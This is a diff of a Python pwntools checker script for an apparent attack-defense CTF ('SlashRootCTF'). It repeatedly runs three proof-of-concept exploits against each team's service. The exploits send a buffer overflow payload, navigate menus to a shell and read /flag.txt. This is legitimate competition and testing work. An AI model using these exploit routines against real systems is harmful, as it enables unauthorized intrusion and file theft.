|
@ -1,9 +1,14 @@ |
|
|
#! /usr/bin/env python2 |
|
|
|
|
|
|
|
|
#! /usr/bin/env python3 |
|
|
# from pwn import context, remote |
|
|
# from pwn import context, remote |
|
|
from pwn import remote, context |
|
|
from pwn import remote, context |
|
|
from multiprocessing import pool |
|
|
|
|
|
context.log_level = "error" |
|
|
|
|
|
|
|
|
from multiprocessing import Pool |
|
|
|
|
|
from time import sleep |
|
|
|
|
|
import logging |
|
|
|
|
|
import os |
|
|
|
|
|
|
|
|
|
|
|
context.log_level = logging.ERROR |
|
|
|
|
|
|
|
|
|
|
|
INTERVAL = 60 |
|
|
HOST = "192.168.2.20" |
|
|
HOST = "192.168.2.20" |
|
|
TOTAL_TEAMS = 10 |
|
|
TOTAL_TEAMS = 10 |
|
|
FORMAT = "SlashRootCTF" |
|
|
FORMAT = "SlashRootCTF" |
|
@ -13,7 +18,7 @@ def poc0(host, port): |
|
|
with remote(host, port) as p: |
|
|
with remote(host, port) as p: |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
msg = p.recvuntil(">") |
|
|
|
|
|
|
|
|
msg = p.recvuntil(">").decode('utf-8') |
|
|
# print(msg) |
|
|
# print(msg) |
|
|
if "young" in msg: |
|
|
if "young" in msg: |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
@ -23,11 +28,11 @@ def poc0(host, port): |
|
|
p.sendline("4") |
|
|
p.sendline("4") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
for _ in xrange(10): |
|
|
|
|
|
|
|
|
for _ in range(10): |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
p.sendline("99") |
|
|
p.sendline("cat /flag.txt") |
|
|
p.sendline("cat /flag.txt") |
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
|
|
|
flag = p.recvuntil("}").decode('utf-8') |
|
|
# print flag |
|
|
# print flag |
|
|
if FORMAT in flag: |
|
|
if FORMAT in flag: |
|
|
return True |
|
|
return True |
|
@ -48,7 +53,7 @@ def poc1(host, port): |
|
|
p.sendline("3") |
|
|
p.sendline("3") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("0") |
|
|
p.sendline("0") |
|
|
if "Who" in p.recvuntil(">"): |
|
|
|
|
|
|
|
|
if "Who" in p.recvuntil(">").decode('utf-8'): |
|
|
return False |
|
|
return False |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
@ -61,7 +66,7 @@ def poc1(host, port): |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
p.sendline("99") |
|
|
p.sendline("cat /flag.txt") |
|
|
p.sendline("cat /flag.txt") |
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
|
|
|
flag = p.recvuntil("}").decode('utf-8') |
|
|
if FORMAT in flag: |
|
|
if FORMAT in flag: |
|
|
return True |
|
|
return True |
|
|
else: |
|
|
else: |
|
@ -76,17 +81,17 @@ def poc2(host, port): |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("6") |
|
|
p.sendline("6") |
|
|
if "Lv: 1000000" in p.recvuntil(">"): |
|
|
|
|
|
|
|
|
if "Lv: 1000000" in p.recvuntil(">").decode('utf-8'): |
|
|
p.sendline("2") |
|
|
p.sendline("2") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("4") |
|
|
p.sendline("4") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
for _ in xrange(10): |
|
|
|
|
|
|
|
|
for _ in range(10): |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
p.sendline("99") |
|
|
p.sendline("cat /flag.txt") |
|
|
p.sendline("cat /flag.txt") |
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
|
|
|
flag = p.recvuntil("}").decode('utf-8') |
|
|
if FORMAT in flag: |
|
|
if FORMAT in flag: |
|
|
return True |
|
|
return True |
|
|
else: |
|
|
else: |
|
@ -95,9 +100,50 @@ def poc2(host, port): |
|
|
return False |
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def poc(host, port): |
|
|
|
|
|
with remote(host, port) as p: |
|
|
|
|
|
msg = p.recvuntil(">").decode('utf-8') |
|
|
|
|
|
if "Who" in msg: |
|
|
|
|
|
p.sendline("Leo") |
|
|
|
|
|
msg = p.recvuntil(">").decode('utf-8') |
|
|
|
|
|
if "Leo" in msg: |
|
|
|
|
|
p.sendline("Y") |
|
|
|
|
|
msg = p.recvuntil(">").decode('utf-8') |
|
|
|
|
|
if "What" in msg: |
|
|
|
|
|
return True |
|
|
|
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def check(team): |
|
|
|
|
|
port = (60004 + (team*100)) |
|
|
|
|
|
r = poc(HOST, port) |
|
|
|
|
|
r0 = poc0(HOST, port) |
|
|
|
|
|
r1 = poc1(HOST, port) |
|
|
|
|
|
r2 = poc2(HOST, port) |
|
|
|
|
|
return "Team [{:02d}] {} {} {} {}".format(team, r, r0, r1, r2) |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def init_logging(logFileName: str, debug: bool = False): |
|
|
|
|
|
logFormatter = logging.Formatter( |
|
|
|
|
|
fmt="[%(asctime)s][%(levelname)s] %(message)s", |
|
|
|
|
|
datefmt='%d-%b-%y %H:%M:%S') |
|
|
|
|
|
|
|
|
|
|
|
rootLogger = logging.getLogger("checker") |
|
|
|
|
|
|
|
|
|
|
|
consoleHandler = logging.StreamHandler() |
|
|
|
|
|
consoleHandler.setFormatter(logFormatter) |
|
|
|
|
|
rootLogger.addHandler(consoleHandler) |
|
|
|
|
|
|
|
|
|
|
|
rootLogger.setLevel(logging.DEBUG if debug else logging.INFO) |
|
|
|
|
|
|
|
|
|
|
|
return rootLogger |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if __name__ == "__main__": |
|
|
if __name__ == "__main__": |
|
|
for i in range(1, TOTAL_TEAMS+1): |
|
|
|
|
|
r0 = poc0(HOST, (60004 + (i*100))) |
|
|
|
|
|
r1 = poc1(HOST, (60004 + (i*100))) |
|
|
|
|
|
r2 = poc2(HOST, (60004 + (i*100))) |
|
|
|
|
|
print("Team [%s] %s %s %s" % (i, r0, r1, r2)) |
|
|
|
|
|
|
|
|
checker_logger = init_logging("checker.log") |
|
|
|
|
|
while True: |
|
|
|
|
|
with Pool(TOTAL_TEAMS) as p: |
|
|
|
|
|
results = p.map(check, range(1, TOTAL_TEAMS+1)) |
|
|
|
|
|
for result in results: |
|
|
|
|
|
checker_logger.info(result) |
|
|
|
|
|
sleep(INTERVAL) |